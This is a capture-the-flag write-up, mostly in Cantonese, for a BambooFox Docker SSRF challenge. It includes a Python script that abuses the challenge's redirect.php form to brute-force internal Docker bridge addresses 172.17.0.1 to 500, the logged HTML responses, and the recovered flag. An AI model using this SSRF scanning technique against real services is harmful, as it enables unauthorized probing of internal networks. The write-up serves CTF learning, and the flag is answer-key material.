Question
http://bamboofox.cs.nctu.edu.tw:53323/
Solution
Hint1
1 2 3 4 5
| There is a lot of server/docker in a company.
So you may need a little brute-force.
You will get the flag between 1 to 500
|
Hint2
1
| Mostly, container share a bridge...
|
呢2個hint想表達既似乎係有另一部裝住flag 既docker server係同題目係同一個subnet.
而係需要少少brute force既 , 咁應該係ip啦
如果係internal network既 , 咁應該係由172.17開頭
即刻寫條script brute brute佢先
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| import requests
output = "" for i in range(1,501): try: r = requests.post("http://bamboofox.cs.nctu.edu.tw:53323/redirect.php",data={'url':'172.17.0.' + str(i)},timeout=0.5) if "Warning" not in r.text: print "[+] !!!! " + '172.17.0.' + str(i) output += "==============172.17.0." + str(i) + "=====================" output += r.text output += "============================================================\r\n" else: print "[-] Fail : " + '172.17.0.' + str(i) except: print "[-]"
with open("C:/Users/admin/Desktop/out.log", "wb") as f: f.write(output.encode('ascii', 'ignore').decode('ascii')) f.close()
|
最後係 172.17.0.80 搵到條flag
out.log
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46
| ==============172.17.0.79=====================<!DOCTYPE html> <html> <head> <title>Docker-SSRF</title> <link rel="stylesheet" href="style.css"> </head> <body> <div class="center"> <form action="./redirect.php" method="post"> <h2> Redirect to: <input type="text" name="url"> <input type="submit"> </h2> </form> <img src="https://res.cloudinary.com/blog-mornati-net/image/upload/v1472668207/sz9sfwiji9foh0cv1v5p.png" style="width: 60%;"> </div> </body> </html> ============================================================ ==============172.17.0.80=====================<!DOCTYPE html> <html> <head> <title>Flag</title> <style> .bk { background-color: aliceblue; } .block { margin: auto; width: 50%; padding: 20px; text-align: center; margin-top: 10%; border: solid 2px; } </style> </head> <body class="bk"> <div class="block"> <h2>BAMBOOFOX{5srF1n0ocK3r}</h2> <h3><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SSRF%20injection">Server-Side Request Forgery!!</a></h3> <img src="https://d3eaqdewfg2crq.cloudfront.net/wp-content/uploads/2013/08/image2-1024x425.png" style="width: 100%;"> </div> </body> </html> ============================================================
|
Flag
BAMBOOFOX{5srF1n0ocK3r}